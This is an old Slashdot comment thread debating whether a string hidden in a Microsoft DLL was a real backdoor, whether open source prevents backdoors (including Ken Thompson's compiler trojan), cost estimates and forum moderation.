Re:Why is slashdot ignoring this important news?

[legoboy]

Close, but wrong.

My post is trollish, but I really don't care if it gets moderated. At least several hundred people (probably) saw it already, I got what I was going for.

The only advantage to the moderation and +1 bonus is that people are more likely to see your posts when you want them to. By the same virtue, how many people saw your also trolling post at 0?

Will you see this one?

------
Following line: Good example of Fair Use.

Re:Why is slashdot ignoring this important news?

[legoboy]

That fact that he is correct in this circumstance notwithstanding, does anyone have any doubt that Zico is easily Slashdot's most frequently moderated up troll, period?

It's not some issue I have with his karma and/or the infamous karmawhoring of others. I have enough of my own for a +1 and about 60 first posts without losing same. It's more that I can't help but wonder why I see four posts by Zico on this article, all saying the same thing, and all of them above my default Score: 2 threshold, despite the fact he had the courtesy to start a couple of them at one.

It's funny, actually.

And Zico, I think that the reason this was posted is because Slashdot is still attempting to produce original content, despite the fact that the quality thereof is abysmal. (See: Katz, Jon - Martyr to the Geeks; Katz, Jon - the "this profiling... it includes geeks" guy; Katz, Jon - the "instead of turning in geeks, let's turn in jocks. That'll get them" guy; Katz, Jon - "someone asked me to please die"; etc)

------
Following line: Good example of Fair Use.

Elitism...

[CoughDropAddict]

I wish that people posting stories would engage in the follow-up dialogue. I'd really appreciate seeing ESR responding to the reasonable accusations that this is innacurate, FUD, etc...

Especially as one who trumpets the virtues of open source, I think ESR should see the value in dialogue between peers, as opposed to a celebrity posting an article on the front page of Slashdot and then retiring back to the 10th floor of the Hilton.

There are many figures who are known for posting comments on stories by or about them. John Carmack, Mandrake, RedHat, Bruce Perens, I'm sure there are more. This is good. I only wish it were more common.

Re:The economics of backdoors

[prizog]

"Seriously, my question is, how can you quantify the expenses and losses of something like this?? How much did the DoS attacks on Yahoo, eBay and others cost? "

The DoS attacks cost them some fraction of their business over some fraction of a day.

In this particular case, it costs companies nothing. Unless: 1. M$ sells a patch rather than gives it away. or 2. Someone were to use this to break into their system. If any system is broken into as a result of this, the time to repair any damage done should be taken out of microsoft's hide.

If your electrician fucks up and electrocutes your cat, you would make him pay.

Why should Free software be immune to this?
Because system administrators can check the code themselves - that's due diligence.

Re:The Linux community should not revert to FUD!

[Isomer]

Speaking of easter eggs, I fell across one in
shutdown the other day. if someone is logged in
as 'tyler' they get a "Going down mr tyler?" message
as the shutdown message as well as the standard
message (System is going down for a reboot NOW)...

The Famous Back door in OSS software.

[Isomer]

Theres been a very famous back door in OSS software,
one that was not visible by reading the source.
It involved a compiler, and someone with a lot
of spare time.

Basically it goes like this: You take a compiler,
detect when your compiling login and insert a
back door into login. You also detect when your
compiling the compiler and add the code back.
Read about it here

Re:The Famous Back door in OSS software.

[Isomer]

True, but how many well used OSS compilers are there that aren't egcs/gcc ? Something like this could perpetuate a long time in the OSS world. Just make sure you put it somewhere in some code that doesn't change much.... :)

Re: The Linux community & FUD

[CentrX]

First of all, this is not "the Linux community" that's saying what ESR said, it's what ESR said. Obviously, an entire community is not going to have uniform views. Regardless, this news was merely passed along by Slashdot. The issue was accepted as true by NT Bugtraq, the Wall Street Journal, ZDNet, CNN, etc. That's a lot of qualified news sources (if you ignore ZD ;). Consequently, it's not as though Slashdot took a mere rumor and passed it along with the gusto of a report on the End of the World.

What ESR said, that there will never be something like this in the BIND library is true. There will never be a backdoor in the BIND library. That's obviously not to say that the BIND library will never have bugs or security issues. That's not what he was saying.

Chris Hagar

Indirect losses

[CentrX]

It would be possible for a company to lose customers if their website was defaced. For instance, if the company is in the business of web security and they can't even protect their own system (although that begs the question why they're using IIS).

Chris Hagar

He didn't say it was a panacea

[CentrX]

ESR just meant that there would never be a backdoor in open-source software. People would find it much too quickly for it to ever represent a threat. He was not addressing whether open-source is in all situations more secure than closed-source software.

Chris Hagar

Out of context

[CentrX]

First of all, I would like to say that, after a perusal of the page you cited, I'm going to go with some other commenters in what they said that it does not apply to insecurity of open-source. Secondly, I was saying what it seemed to be exactly what ESR was saying. I was not providing my own opinions as to whether a backdoor would be possible in open-source software.

Chris Hagar

Re:First insightful post again

[keefer]

Wow, how does someone get to -2? I am duly impressed.

I'll never doubt a troll again.

[keefer]

I thought the -2 stuff was a joke. Well, the joke was on me!

You continue to earn my respect, trolls, and maybe it's just because I'm slaphappy at 4AM, but you are providing a valuable service!

This is getting pethetic

[coli]

First of all, there is no backdoor. Look at the previous article...

Second, this is not, I repeat, *not* years old. Its more like dyas old...

MY, what is wrong with Slashdot's article selection process? Anything that is worded pro-Linuz, anti-MS has a high change of getting posted. Regardless of its truth.

Slashdot is setting a very very bad example.

*sigh*

An expert begs to differ...

[bjtuna]

...but it's not me. Kurt Seifried, the security expert from securityportal.com writes in his article Do you trust your software? that Linux backdoors COULD and probably DO exist because, despite the fact that the source is open, almost nobody is actually reading it. He also claims that many of the exploits found in common open-source software such as BIND and wu-ftpd are placed there intentionally, like by the US government.

Notice: do not flame me. I do not believe in this fairy tale; I'm just reporting on it. I have personally spoken to Kurt on IRC and made him explain himself. He had some good arguments but I still think he's wrong :)

Re:The economics of backdoors

[dsplat]

The number that I understand to be generally acceptable is that an employee costs twice what s/he is paid. So an employee that grosses $50k/yr costs the company $100k/yr when all the overhead, taxes and crap is figured in.

For back of the envelope calculations that is an excellent rule-of-thumb.

Re:The economics of backdoors

[dsplat]

Look at it this way: Do you believe I underestimated these other costs by a factor of 1000? That's about what it takes to move $480,000 to the realm of "hundreds of millions of dollars". I agree there are other costs, but to say that an admin's paycheck makes up only 0.5% of the actual cost seems to be stretching things...

I'm sorry that I wasn't clear. I agree with your point. At worst, you underestimated by an order of magnitude. The only reason that I think you might be off is that I think the number of servers hit was underestimated because of under-reporting. I was trying to bring up some related issues.

Re:The economics of backdoors

[dsplat]

Number of affected servers: 3000
(This is almost certainly way low, in that I'm assuming 25% of approximately 12,000 servers on the Internet. I have no real idea how many servers there are.)

Number of hours spent by a net admin to following the problem, creating or downloading a patch, and verifying both the problem and the solution: 4?

Average hourly wage of a net admin: $40?

Putting it together: 3000x4x40 = $480,000. Unless my estimates are off by a combined three orders of magnitude, it's probably not going to be "hundreds of millions of dollars". Sorry, ESR.

I have two points to make about this. Farther along you did point out that installing patches is in the job description. True enough. Installing patches to correct a backdoor, as this was alleged to be, should not be. But, your calculations leave out a number of other factors. The cost of an employee's time doesn't stop at his paycheck. There was server downtime involved. There are also other non-salary costs in keeping employees: benefits, the employer's contribution to Social Security, office space, etc.

A former coworker of mine, and still a friend, pointed out something to me a couple of years ago about time spent by engineers, or anyone producing a product. It's value should be measured by what they could produce if not interrupted by whatever you are evaluating the cost of. Certainly, for a network administrator, this is part of the job. And what about the little start-up, where the three hackers with the brilliant product idea who are slinging code 18 hours a day also put together the company web site because they are paying themselves in equity in the company rather than in dollars, which they don't have. They can't hired a net admin right now, but the cost to them of those 4 hours may be huge.

Re:oh really..

[jesser]

Most of the machines I see people putting on the net are rootable out of the box and never changed. And most of those machines are Red Hat linux (opensource, yay! *cough* *cough*).

Well, "rootable" boxes do tend to run unix variants.

--

back door won't be tried

[jesser]

Under all that scrutiny, a back door would be unlikely to escape detection for even four *days*. Anybody competent enough to try inserting a back door in Apache knows this in their bones. So it would be pointless to try, and won't be tried.

Keep telling people that, and eventually they will stop looking at the source code for the software they use. Someone will include a hard-to-see security hole, on purpose, and then exploit it selectively several days later. It won't make slashdot, because the software won't be apache (enough paranoid people run apache), but it will happen.

--

Frontpage for UNIX/Linux

[VB]

I've been running this stuff for about a year, and, have yet been unable to compromise these servers, or find someone else who has been able to.

Anyone else have a different story?

Would be nice to have some definitive assurance.
Linux rocks!!! www.dedserius.com

Way to sling the FUD. Here's some more...

[Greyfox]

The Microsoft batting average over the years isn't so good. There's the secret tracking code that gets tagged into documents on networked machines, there're the repeated rumors that during the Windows or MSN install your hard disk is scanned and the results sent back to Microsoft. There's the extra key alleged to allow the NSA to decrypt secure communications. And of course the dirty tricks they pulled with DR DOS and the persistent rumors that Gates broke into the business by steaing a copy of BASIC. They denied it all, of course.

With UCITA coming down the pike, I'm sure assorted other back doors will be forthcoming. The question is, do you as a large business in an arena competing with Microsoft want to trust your future to an OS and apps your competitors wrote? Competitors whose history of dirty tricks goes back longer than they've been in business?

Cockroaches, ESR and even BSD.

[mr]

http://www.bio.umass.edu/bio logy/kunkel/cockroach.html has by far more than most people want to know. As far as bugs go, cockroaches arn't so bad. Flies, bees, hornets, ants (fire ants come to the top) are FAR worse. It is just our conditioning that makes roaches on the hated list.

Cockroaches are very sensitive to water loss, that is why they don't like the light. Airflow, low humidity, and no dripping water will kill them quickly.

So darkness with alot of airflow and no water, and they won't thrive, survive, or breed. If you want to kill roaches with mold spores, then you have to have the damp conditions. The use of diatematous earth causes cuts in the excskeleton, and dehydration. Note mold/DE will work well for ants also.

Now...ESR's latest story he tries to forward the Linux-as-OpenSource adjenda (note how he speaks at The Bazzar/elsewhere and how he wants to see BSD have more success, yet no BSD binaries for fetchmail and no mention of BSD. So much for using his bully pulpit to back what he says.) And, although his points about OpenSource are correct, the statement about "inserted a security-compromising back" seems to be false. So this story by ESR falls short of what it could have been.

Of course, pointing out backword text of Netscape engineers are weenies!, is not as damning as a backdoor. A backdoor is nice press, too bad it is looking like it is not true.

Taking this article and waving it under other people's noses as proof of how much better OpenSource is over closed source will do little good because the reports of a backdoor is false. Nice preaching to the choir, but you need to be convicining others, not the readers of /.

Re:The Linux community should not revert to FUD!

[ecampbel]

No, you're wrong. "Netscape programmers are weenies!" is simply used to encrypt certain data travelling back and forth between two Microsoft components. Clearly, Microsoft did not intend for this security method to be full proof; they simply wanted to keep the casual observer from seeing certain data. Here's what Russ cooper said:

While reports focused on a phrase -- "!seineew era sreenigne epacsteN" or the backwards spelling of "Netscape engineers are weenies!" -- which was present in the DLL, that's a red herring, said Cooper, adding that the phrase is not a password, but a cypher key used to scramble the address of Web pages requested by users..

Re:Open Source's Glaring Security Problem

[ecampbel]

What if I "borrow" the executive's hard drive for a little while, and then use my custom version of Linux that doesn't repect Administrative Privileges to install my alternative file system, and then return the hard drive to its computer?

Re:Yes ... there is.

[lunatik17]

It may be rare to hear about a Linux exploit, but is there really any way of proving it's because of duplicity and not actually less bugs? I realize all code is buggy, OSS code among them. But four years is rediculous, and would never happen in the OSS realm, period.

And if there really was never a back door, then why did they admit there was? I'm sorry, but this seems just as likely to be backpedaling to cover their arse as it could be an honest mistake. And honesty is not something Microsoft is particularily well known for.

Here's my DeCSS mirror. Where's yours?

Re:Ummmmm NO.

[lunatik17]

I have my doubts that M$oft.com even runs on IIS because it isn't built to handle high amounts of traffic.

No, I'm sure it uses IIS. You see, you can overcome IIS's shortcomings, it just takes a crapload of redundancy. Microsoft.com is distributed across rows upon countless rows of NT boxes in order to handle the traffic.

Here's my DeCSS mirror. Where's yours?

The economics of backdoors

[ContinuousPark]

Nor will it compensate their bosses for what could be millions of dollars in expenses and business losses.

Now, I don't want to sound like a flamebait poster, but this reminded me of the companies that got Kevin Mitnick in jail. "We lost hundreds of millions of dollars because of him", they said. Were they exaggerating or not?

Seriously, my question is, how can you quantify the expenses and losses of something like this?? How much did the DoS attacks on Yahoo, eBay and others cost? How much money would Microsoft really lose because of a beta copy of Windows Me is on the loose?

I'm not saying that there is no cost, that there will no problem or expenses for the companies whose webmasters will spend the weekend struggling finding patches for a backdoor that is not really one, but will it be millions of dollars as ESR put it? Isn't installing patches already the webmasters job? How can there be additional expenses? Where does this figure come from? Can someone explain to me the economics of this?

Re:The economics of backdoors

[DMuse]

The cost of an employee's time doesn't stop at his paycheck. There was server downtime involved. There are also other non-salary costs in keeping employees: benefits, the employer's contribution to Social Security, office space, etc.

The number that I understand to be generally acceptable is that an employee costs twice what s/he is paid. So an employee that grosses $50k/yr costs the company $100k/yr when all the overhead, taxes and crap is figured in.

Re:The economics of backdoors

[Puff65535]

Netcraft lists 2,742,931 IIS servers as of last month, thats a heck of a lot more than the 12,000 your claiming. Lets say 10 servers are in each department that is managed by a PHB who watches the evening news(5:30pm in my neck of the woods) in which the MS "hole" was worthy of mention, and(on CBS) an impressivly ominous icon. If, say 80%, of these PHB's made an emegency afterhours call to the lead techie the immediate price tag of the event would be (2M/10)*techiecost. When I worked at HP changing a defective CDROM drive was billed at a little over $1000, which is about the severity of this. So by my calculation $200M is a reasonable estimate.

Re:The economics of backdoors

[gilroy]

Quoth the poster (quoting ESR):

Nor will it compensate their bosses for what could be millions of dollars in expenses and business losses.

Now, I don't want to sound like a flamebait poster, but this reminded me of the companies that got Kevin Mitnick in jail. "We lost hundreds of millions of dollars because of him", they said. Were they exaggerating or not?

OK, that "millions of dollars" bothered me, too, because either a source or at least a back-of-the-envelope calculation would have been nice. But it will certainly cost something. Let's do that back-of-the-envelope:

Number of affected servers: 3000
(This is almost certainly way low, in that I'm assuming 25% of approximately 12,000 servers on the Internet. I have no real idea how many servers there are.)

Number of hours spent by a net admin to following the problem, creating or downloading a patch, and verifying both the problem and the solution: 4?

Average hourly wage of a net admin: $40?

Putting it together: 3000x4x40 = $480,000. Unless my estimates are off by a combined three orders of magnitude, it's probably not going to be "hundreds of millions of dollars". Sorry, ESR.

Also quoth the poster:

Isn't installing patches already the webmasters job? How can there be additional expenses?

Well, for one, this is an urgent security fix so this means bringing such people in on short notice, not as part of their day-to-day. But more importantly, sure, this is what net admins do. But in this particular case, you can point to the exact cause of this cost. What's more, it isn't even a case of code written in good faith that happens to break under real world conditions. This is a designed flaw.

Farmers have insurance in case of flood. That doesn't excuse the guy who blows the dam.

Re:The economics of backdoors

[gilroy]

Quoth the poster:

have two points to make about this. Farther along you did point out that installing patches is in the job description. True enough. Installing patches to correct a backdoor, as this was alleged to be, should not be. But, your calculations leave out a number of other factors. The cost of an employee's time doesn't stop at his paycheck. There was server downtime involved. There are also other non-salary costs in keeping employees: benefits, the employer's contribution to Social Security, office space, etc.

Guilty as charged. All that stuff should be considered. But including it all would be hard (in the sense of "non-trivial") and that defeats the purpose of a back-of-the-envelope calculation. BOECs are intended to be quick or they're pointless.

Look at it this way: Do you believe I underestimated these other costs by a factor of 1000? That's about what it takes to move $480,000 to the realm of "hundreds of millions of dollars". I agree there are other costs, but to say that an admin's paycheck makes up only 0.5% of the actual cost seems to be stretching things...

Sorry to go all pedantic, but I teach physics and I'm always trying to get across the use of back of the envelope. It can be the most important space available...

Re:The economics of backdoors

[gilroy]

Quoth the poster:

Netcraft lists 2,742,931 IIS servers as of last month, thats a heck of a lot more than the 12,000 your claiming

It certainly is. I wasn't exactly claiming any number at all. I was making a wild (apparently ludicrously low) guess, since I really had no idea how many machines would be suffering from the bug. This, of course, moves the estimate into the "hundreds of millions" range.

In my own defense, at least I got the percentage more or less right. As for the hard numbers, hey, what's a factor of a 1000 between friends? :)

Thanks for the correction.

Re:on and off topic- Regarding the above posts.

[orkysoft]

Hey, you're being sarcastic! Go to Segfault! :-)

It's not really all that bad as you make it sound. Regularly I do see "Microsoft isn't that bad" posts being moderated up, because they have a valid point.

Complacency

[Espen]

"Apache has never had an exploit like this, and never will. Nor will Linux, or the BIND library, or Perl.."

This has already proven to be untrue in the case of Perl at least, as noted in this article in theRegister

Open Source makes it harder to remain undetected, but making too much of a deal out of this fact can engender complacency.

Re:Complacency

[Espen]

It's one thing to spread FUD, but to spread trivially refutable FUD, and link to the article that refutes it...?

I'm glad you put a question mark at the end of that. In terms of system security it makes a trivial amount of difference how or where the backdoor is implemented if the result is root privileges for the intruder.

'Incompetence is the problem'? When someone puts a deliberate backdoor in their perl-based CGI suite, its not due to incompetence or sloppy code (although the specifics of its implementation may well be), but flawed judgement or intentions.

Source != Secure

[Kinthelt]

Take for instance Ken Thompson's CC hack. Just because you can see the source, doesn't mean you can see all the backdoors.

Of course it may be a bit of an extreme example, but you get the idea :)

Yes ... there is.

[Issue9mm]

I'm assuming that you're using the information gathered and delivered by Russ, of NTBugTraq. Well then, let me post this, which completely belies his statements. Judge for yourself.

Re:Yes ... there is.

[gilroy]

Quoth the poster:

If Slashdot would like to start posting essays on every Linux buffer overrun that comes down the pike,

I might be naive, because (not being a net admin) I don't actually track these particular threads, but are you sure vulnerabilities in Linux aren't discussed here? I seem to remember them being posting. I concede that MS vulnerabilities rile up the troops and generate a higher volume of posts, but I'm not sure the others are really ignored, per se.

Besides that, it's still unfair to rip into Slashdot for quoting a WSJ article that quoted MS as admitting this was a big problem. Here is the dilemma, apparently: Many people complain that Slashdot reported something (admitted, at the time, even by MS to be a problem) and didn't wait to see where the chips fell. But many -- and sometimes the same people -- like to post and complain that Slashdot news is old and has been reported in other places.

Since Slashdot is equally reviled for both extremes, they are probably doing something right. :)

Re:oh really..

[kcarnold]

Doom? I thought the Word easter egg was a pinball game (Word 97 -- which version are you talking about?) To get to Word 97 Pinball (a POS, but still...), open a new instance, sent font color to Blue, size Bold, (size 12??? not sure), and type Blue (capital B, space at the end). Go to Help, About and click on the envelope under the W.

btw, the Excel flight simulator is also easy to get. Again in a new instance, press F5 (Goto) and type the range x97:l97. Press Enter and the range starting at L97 is selected. Press Tab to move the cursor one cell to the right. Then hold down Ctrl and Shift while you click on the Chart Wizard button on the tool bar. Left mouse button accelerates, right button decelerates or accelerates in reverse. Look for and laugh at the scrolling text box ("In the beginning, there was nothing. Then there was Microsoft Excel. (well there were some other versions of Excel before that." (other stuff follows; I can't remember off the top of my head)) and the messed-up wavy lake (as my friend Jeremy Best called it). Have fun, but remember to restart Windows and boot into Linux sooner than later.

Ummmmm NO.

[Christianfreak]

Well maybe they are reported faster to MS but who gets to see them but M$oft? Who gets to decide whether or not we know about potential security bugs... the answer again: Microsoft.

Now let me ask you this. Is Microsoft interested in the security or your system? No. They are interested in making money which is why there are security bugs that go unreported and if anyone was bothering to check the code, a hole that huge would have been found. Last but not least who runs the Internet? It isn't IIS my friend. Apache almost 60% of websites you see everyday. I have my doubts that M$oft.com even runs on IIS because it isn't built to handle high amounts of traffic. By the way Apache servers get hammered just as much as IIS with attacks. I've seen logs from Linux webservers. I know what people are trying to get in almost everyday. A person who knows what they are doing has good security with Apache. With IIS you may know what you are doing but you have no idea what humorous microsoft programmers decided to say about netscape, linux, Jon Katz, or anyone else :)

Re:Open Source's Glaring Security Problem

[John+Murdoch]

Hi!

(Sorry to take so long in responding. Had to do my tax returns. Ugh.)

Any security system requires positions of trust. You have pointed out (much more politely than a couple of others) that root privileges are required to replace pieces of the OS--and since a bad guy has to have root privs, why bother with an exploit?

In a word, "anonymity."

In my career I have been involved with three different cases of system attacks. In each of the three cases the perpetrator was an employee. In one case there was enough evidence to convict the employee and send him to prison. In another case the client didn't want to prosecute--but was so damaged by the exploit that it essentially collapsed. It was acquired by a competitor a few months later and most of the office employees were let go.

In all three cases the perpetrator was a trusted insider. The users had the equivalent (on their systems) of root privs.

What caught the first guy, but didn't catch the second? The first guy was, in effect, using his root privs locally to play around with records (trying to cover up an embezzlement). The second guy did everything remotely--the damage wasn't apparent until 2-3 months after he was gone, by which time it was practically impossible to prove that he was responsible.

I submit that recompiling a file system component, or replacing an ActiveX control, provides the would-be miscreant a higher degree of anonymity, and thus a lower risk of getting caught.

Can you modify a system file in Windows 2000? Yes. (Although trying to replace any system file in 2000 is a pain, even if you're not being malicious.) But hacking the binary is vastly more difficult than recompiling from commented source code, no? Which was my point: it is easier to run an in-house exploit on OSS.

Yours,

John Murdoch

Open Source's Glaring Security Problem

[John+Murdoch]

ESR makes a good point in emphasizing that Open Source software can be reviewed by anybody, and actually is reviewed by many developers when a new release is distributed. He is entirely correctly in asserting that this process (in essence, peer review) prevents a programmer from widely distributing a back door. That is, without question, a definite plus for Open Source.

On the other hand, there is a definite minus to Open Source--anybody can recompile it. Or even parts of it. So anybody with access to the OS can recompile a small part, substitute that part into the OS, and subsequently replace the original.

For example, suppose I want to snoop on doings in the executive suite. I just modify the file system to write copies into another directory--or send copies of all the CEO's email to my home server. When I have the data I want, I just replace the original versions of the OS--and no one will be the wiser.

You can't do that with closed-source software. Since you don't have the source code, you can't alter the code. So you (or that contract programmer who the company is letting go at the end of the month) can't run a little in-house exploit.

Let me clarify that a bit more: an in-house programmer can't run this kind of exploit using a part of the operating system or a closed-source product (such as a database or email system). However, an in-house programmer can run this kind of exploit on components that he can recompile (such as ActiveX controls). If reasonable source control is in place (everyone must use source control, projects can't be checked out indefinitely) there is little risk. Admittedly, there aren't that many corporations that have reasonable source control policies.

The security problem most corporations face today isn't back doors, or even Trojan Horses. It is the in-house Trojan, put in place by somebody on the inside. It is significantly easier to create an in-house Trojan with OSS.

Which is to say, being "Open" is both a blessing and a curse.

John Murdoch

Re: Thompson's paper and GCC in practice

[Tom7]

I think you're misunderestimating the importance of this point. Most people are using gcc binaries on linux (or at best gcc-compiled gcc), because bootstrapping a compiler is a tricky and painful process. If redhat or any of the major distros accidentally released an "infected" gcc (or even if some other group released a popular "pentium III optimized" compiler, or something), this could really happen.

This same problem also affects the GPL itself -- consider making enhancements to a GPL program which also extend the source language (in a proprietary, perhaps undocumented way). You must release the source code to your enhancements but now they're as good as proprietary, since you can't use the source without a compiler which supports the extensions!

Re:Do post the picture links - post The VA Message

[yuriwho]

I take it you lost some cash buying their stock??

Re:ERIC FUCKING RAYMOND SPEAKS.

[Arctic+Fox]

An interesting find on Google.
Another ESR speaks. (For those of your interested).http://linuxtoday.com/stories/13512_f lat.html
What's that sound? My karma plummeting!

A good quote: "Ironically enough, one result of my getting rich is that I will probably start charging for speaking appearances, now that nobody can plausibly accuse me of doing it for the money. I won't charge open-source user groups or schools, but I will cheerfully extract a per diem from all the business conferences that keep wanting me to to boost their box office. Charging a price for my time will separate the expensive conferences that attract powerful people from the marginal events where the hacker community would get less leverage from my presence."
Be thankful you are not my student. You would not get a high grade for such a design :-)

Re:Zico... Piss Off

[thebruce]

You don't like Slashdot.. Slashdot doesn't like you. No-body forces you to come here and pull your "sand in the vaseline". And yet still you are here. Why is this we ask? hmm look at that hotmal address.. who pays your bills??

If you hail Open Source so much because it gives everyone a say in the result, then how could you get defensive when someone criticizes something about Slashdot? Are you saying you feel like cutting off everyone who has something negative to say about it? Now that's open...

So anyone with a good/bad word for anything /you/ consider worthwhile deserves flaming... Personally, I believed the /. story when it started. As soon as the update came out that it was a non-issue, I knew things like this would errupt.

1) Give /. a break for posting stories as they come...
2) /., be more careful about the 'opinions' expressed in the articles, cuz of something changes, it can come back and slap you in the face...

on and off topic- Regarding the above posts.

[zerocool^]

This is really getting rediculous. Just ONCE i would like to view slashdot at treshold=0 and feel good about the future of the human race.

Regarding this story - I do see it as anti-microsoft and i see the story being taken a different direction other than where the facts say - the facts say M$ has a backdoor in their software. The story says USE APACHE - NO BACK DOORS EVER.
BUT: It is this dude's right to have an opinion about this announcement. It is no reason to post all this garbage about VA linux. Everyone knows its not doing too hot. But i would bet that none of these trolls are the CEO of a publicly traded company.

This is a call to the human nature of posters on /. - PLEASE for the sake of the rest of the world that reads these comments, Have something posative to say. If you have a sarcastic story, go post it on segfault. PLEASE be mindful of the fact that *we* have to wade through your bullshit to find the good comments.

~zero


insert clever line here

Re:on and off topic- Regarding the above posts.

[Signail11]

Thank you for expressing the position of many outraged users of this site who feel geniunely saddened at the current state of this discussion forum. Any post that does not conform to the Open Source Movement party line is instantly moderated to oblivion where no user, especially no non-logged in user (since the change in default score display setting), is likely to see it, thereby supressing dissenting opinions. Isn't the open source community supposed to be more accepting of different opinions? Shouldn't we tolerate and listen to the ideas of people that don't neccesarily agree with our own?

The free interchange of information and ideas is one of the defining foundations of this new interconnected society which many of us have worked passionately to help create and bring to fruition. I believe that we should preserve and indeed cherish differences in thought as a sign of a thriving community that can accept criticism and grow stronger through it. ESR himself once said that "One of the characteristics of healthy cultures is that they can poke fun at themselves." (quoted on www.userfriendly.com). Why is it that we are now unable to tolerate dissent? Is this hacker culture stagnating or dying?

This will be moderated down soon, so please repost this as often as possible.

Re:on and off topic- Regarding the above posts.

[gilroy]

Quoth the poster:

Any post that does not conform to the Open Source Movement party line is instantly moderated to oblivion where no user, especially no non-logged in user ... is likely to see it, thereby supressing dissenting opinions

It's not really suppression, at least in the classic sense, in that all such messages are still posted and still archived and still available. On the other hand, such action is certainly dubious, at the least.

On the other hand, (and you knew it was coming), I see an awful lot of these "Anyone not toting the Open Source party light is moderated to oblivion". Now, admittedly, by definition I cannot know the complete extent of something I do not see, but the sheer number of such posts seems to undercut their thesis. After all, if the moderators were some great camarilla ("camarilla: n. a group of unofficial often secret and scheming advisers", from MW Online) gleefully moderating down non-Open Source comments, wouldn't they be cackling and moderating the complaints down to invisibility?

I surf at a level of "1", which means a logged-in user will automatically show up for me unless moderated down. ACs have a higher threshhold. Despite this, I see an awful lot of dissenting comments. Heck, some days, that's about all I see.

Clearly your mileage may vary but the moderation system seems to be working alright for me. But maybe I'm just another Linux groupie. :)

Re:Real question: Why does anyone care what ESR sa

[gswallow]

One Word: Sendmail.

Re:hello?!?! this is only a day or two late

[MusashiDragon]

Actually, this was written a day or two ago; I think that I saw it on LinuxToday first. Slashdot is just *posting* it a day or two late.

Re:Why is slashdot ignoring this important news?

[Signail11]

"cmdrtaco and crew seem to ignore all of this for some reason or another."

The reason is completely obvious. Ask yourself these three questions:

***What company did CmdrTaco first sell Slashdot to?

***What well known Linux company subsequently bought Andover?

***Is said company's stock below its IPO price?

Editorial indepedence...blah. CmdrTaco and company have sold Slashdot readers down the river for a quick profit. Corporate conscience?!?! Maybe it's Slashdot, VALinux, and Andover get on the cluetrain too. Today's markets are smarter than ever before and the individuals who participate in these markets are able to communicate with each other faster than companies can inhibit or stop this communication. You can't ignore us, you can't control us, and you can't stop us. Enjoying those millions, ESR, RobLimo, CmdrTaco, and company? Well enjoy them now, since a new revolution in information is coming and you're going to be left behind.

Re:I'm not a expert....

[Signail11]

Because they are not utterly irresponsible companies which have sold their souls to the imperative of a quick profit (ahem, Slashdot). They realize that acting like single-minded zealots and wantonly spreading FUD will only decrease their public image, especially when the people are bright enough to know that *there is not backdoor* worth publicizing. It's called responsible journalism and business ethics, something that CmdrTaco, ESR, and company seem to have forgotten or misplaced in their Linux IPO mania.

I've disagreed with the prevailing Slashdot conventional wisdom, so I'm going to lose massive karma because some moderator will feel the urge to supress dissenting opinions.

hello?!?! this is only a day or two late

[Signail11]

This has already been a well-publicized problem for the past two days. I mean, it's even on ZDNet and Cnet. Oh well, I suppose that waiting this long would mean that ESR had time to verify all of his facts.

Opps, it seems that he didn't. Anyway, the string "Netscape engineers are weenies" is indeed embedded backwards inside the referenced dll file. However, this does not allow arbitrary access to websites, nor is it some sort of hidden backdoor password. If you already have authoring permissions on a server, the dll will allow you to read the web pages of other sites that may also be hosted on the server. Essentially, the wall between theoretically independent virtual hosted sites is slightly reduced. The flaw does NOT allow one to modify content, nor does it allow one access to information that is protected by NTFS permissions instead of IIS permissions. The real use of the string is to name mangle all URL requests of a certain form before use by the Microsoft Interdev 1.0 software.

Interesting enough, the scrutiny under which this dll has been examined has revealed the existence of a *real* problem, a buffer overflow that is theoretically explotiable (I'm not sure of the details, but IIRC, it's an unlength-checked strcpy). Open-source software does help expose deliberately placed backdoors, however, it does not target the problem that caused the Microsoft flaw in the first place: untrustworthy programmers. No project, closed source or open source, run under the cathedral model or the bazaar model, can escape the fundemental concept of information security: you must place at least some implicit trust on the people who build/mantain/administer your software. Open source software allows others oversight so that they can spot this type of problem (witness the Dansie Shopping Cart backdoor), but cannot act as a magic pill that solves all problems of this nature. It is naive to believe that just making something opensource makes it inherently more difficult to include backdoors and "design for insecurity." This just reiterates and reemphasizes the need for continual code audits and scrutiny of all executable code in secure operating environments.

oh really..

[*borktheork*]

Cockcroaches breed in the dark.

Cockroaches serve a useful purpose in our ecosystem.

Crackers thrive on code secrecy.

What a load of horseshit. System crackers thrive on end user ignorance. Most of the machines I see people putting on the net are rootable out of the box and never changed. And most of those machines are Red Hat linux (opensource, yay! *cough* *cough*).

It's time to let the sunlight in.

Or maybe it's time to learn to use Soft-ICE. Or run a unix, of course. Anyway, does this surprise anyone? I mean, we're talking about a company that puts flight simulators in their spreadsheet and a doom clone in their word processor.

Real question: Why does anyone care what ESR says?

[gustar]

Though it is off topic, reading these posts brings to mind one central question:

Why is ESR afforded so much attention?

Based on what I have seen, I fail to see where or how he has contributed to the open source movement in even the most trivial of ways.

While he has certainly done well for himself, (speaking engagements, etc.) acting as a self proclaimed spokesman for the open source community what has he really contributed to that same community (Does fetchmail really count)?

There are any number of real contributors to the open source community (Larry Wall, Richard Stallman, anyone in the apache foundation just to name a few) out there. Anyone of which would be happy to comment on any aspect of the open source phenomenon and its impact on the software world in general.

So why waste even an ounce of attention on ESR?

But can we trust them?

[roman_mir]

The real question is: can we trust closed source software providers? There is no simple answer. We can not trust Microsoft (DOJ, Antitrust suit) for different reasons, don't even have to find any backdoors. In principle Microsoft or any other software vendor can not afford to have any of their software compromised in this way if they wish to keep their sales up. Basically, there is an incentive for them to produce 'good' software and not 'bad' software, of-course it does not mean they will do that right.
On the other hand we can not really know how many different backdoors there are in what kind of software out there. If NSA or the feds want Microsoft to allow them to search anyone's computer without too much hastle, Microsoft will have to put some back door in their software. - What happens to the peer checks, I wonder?

Clearly, a respectable company will not jeopardize their businesses by putting "back doors" in their binaries.
In this case Microsoft screwed up in multiple ways, they did not encrypt the string that is used as an encryption key by itself. The wording in the string they used (the 'weenies')- it's not just childish, it's dumb.

Back to our question - should we trust our closed source vendors? I think we can trust them not to geopardize their businesses too much, but we should be cautious and do our research before using any software like that for any serious businesses. Linux definitely is the winner in this criteria.

Linux article sponsored by Microsoft

[[TWD]insomnia]

http://www.it-analysis.com/00-04-14-3.html

Is it a sign that Microsoft is now considering Linux?

the myth about linux stocks falling

[small_dick]

Well, it isn't exactly a myth -- they are falling, and falling rapidly.

But many other stocks are falling as well, with Linux falling somewhat worse. Even high rollers with great quarters (SUN, AMD) are taking an undeserved beating.

So, the questions comes down to:

